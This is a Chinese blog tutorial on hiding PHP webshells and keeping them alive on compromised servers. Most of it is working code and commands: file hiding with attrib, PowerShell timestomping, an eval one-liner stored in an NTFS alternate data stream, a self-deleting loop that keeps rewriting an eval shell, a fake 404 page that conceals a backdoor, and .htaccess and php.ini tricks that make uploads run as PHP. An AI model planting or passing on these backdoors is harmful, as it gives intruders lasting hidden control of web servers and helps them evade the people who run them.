PHP后门隐藏的一些技巧总结


Posted in PHP onNovember 04, 2020

前言

如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。

1、隐藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

attrib +s +a +h +r shell.php //隐藏shell.php文件

2、修改文件时间属性

当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。

//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令获取文件属性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某个文件夹下所有文件的创建和修改时间

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隐藏文件内容

在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。

利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死马

不死马会删除自身,以进程的形式循环创建隐蔽的后门。

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //删除自身
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话
 sleep(10); //间隔时间
}
?>

处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。

5、中间件后门

将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。

github项目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404页面隐藏后门

404页面主要用来提升用户体验,可用来隐藏后门文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件构成PHP后门

一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隐藏后门文件

php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。

;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"

需重启服务生效,访问任意一个php文件即可获取webshell。

总结

到此这篇关于PHP后门隐藏的一些技巧的文章就介绍到这了,更多相关PHP后门隐藏技巧内容请搜索三水点靠木以前的文章或继续浏览下面的相关文章希望大家以后多多支持三水点靠木!

PHP 相关文章推荐
sourcesafe管理phpproj文件的补充说明(downmoon)
Apr 11 PHP
php中防止伪造跨站请求的小招式
Sep 02 PHP
PHP中函数rand和mt_rand的区别比较
Dec 26 PHP
php二维数组用键名分组相加实例函数
Nov 06 PHP
php自定义apk安装包实例
Oct 20 PHP
php导入模块文件分享
Mar 17 PHP
PHP借助phpmailer发送邮件
May 11 PHP
php 微信公众平台开发模式实现多客服的实例代码
Nov 07 PHP
PHP curl 或 file_get_contents 获取需要授权页面的方法
May 05 PHP
yii2.0整合阿里云oss上传单个文件的示例
Sep 19 PHP
PHP PDOStatement::setFetchMode讲解
Feb 03 PHP
php修改word的实例方法
Nov 17 PHP
phpstudy2020搭建站点的实现示例
Oct 30 #PHP
解决PHPstudy Apache无法启动的问题【亲测有效】
Oct 30 #PHP
PhpStorm 2020.3:新增开箱即用的PHP 8属性(推荐)
Oct 30 #PHP
2020最新版 PhpStudy V8.1版本下载安装使用详解
Oct 30 #PHP
PHP fopen中文文件名乱码问题解决方案
Oct 28 #PHP
PHP dirname功能及原理实例解析
Oct 28 #PHP
基于ThinkPHP删除目录及目录文件函数
Oct 28 #PHP
You might like
大师制作的中短波矿石收音机
2020/04/02 无线电
PR值查询 | PageRank 查询
2006/12/20 PHP
php数组函数序列之array_unique() - 去除数组中重复的元素值
2011/10/29 PHP
PHP中的Streams详细介绍
2014/11/12 PHP
php异步:在php中使用fsockopen curl实现类似异步处理的功能方法
2016/12/10 PHP
kindeditor 加入七牛云上传的实例讲解
2017/11/12 PHP
PHP单例模式模拟Java Bean实现方法示例
2018/12/07 PHP
IE不出现Flash激活框的小发现的js实现方法
2007/09/07 Javascript
js下拉菜单语言选项简单实现
2013/09/23 Javascript
js实现DOM走马灯特效的方法
2015/01/21 Javascript
BootStrap轻松实现微信页面开发代码分享
2016/10/21 Javascript
javascript闭包功能与用法实例分析
2017/04/06 Javascript
JavaScript实现的选择排序算法实例分析
2017/04/14 Javascript
jQuery+vue.js实现的多选下拉列表功能示例
2019/01/15 jQuery
深入理解es6块级作用域的使用
2019/03/28 Javascript
详解Bootstrap 学习(一)入门
2019/04/12 Javascript
[01:03:36]Ti4 循环赛第三日DK vs Titan
2014/07/12 DOTA
python使用内存zipfile对象在内存中打包文件示例
2014/04/30 Python
Python实例分享:快速查找出被挂马的文件
2014/06/08 Python
Python爬虫之urllib基础用法教程
2019/10/12 Python
Python urllib库如何添加headers过程解析
2020/10/05 Python
如何使用 Flask 做一个评论系统
2020/11/27 Python
CSS3 3D制作实战案例分析
2016/09/18 HTML / CSS
印度在线内衣和时尚目的地:Zivame
2017/09/28 全球购物
Servlet方面面试题
2016/09/28 面试题
给老师的检讨书
2014/02/11 职场文书
股权投资意向书
2014/04/01 职场文书
运动会口号8字
2014/06/07 职场文书
红领巾广播站广播稿
2014/10/19 职场文书
免职证明样本
2014/10/23 职场文书
2014年学习委员工作总结
2014/11/14 职场文书
个人年终总结开头
2015/03/06 职场文书
2015年除四害工作总结
2015/07/23 职场文书
情感电台广播稿
2015/08/18 职场文书
人事任命书范本
2015/09/21 职场文书
SQL中去除重复数据的几种方法汇总(窗口函数对数据去重)
2023/05/08 MySQL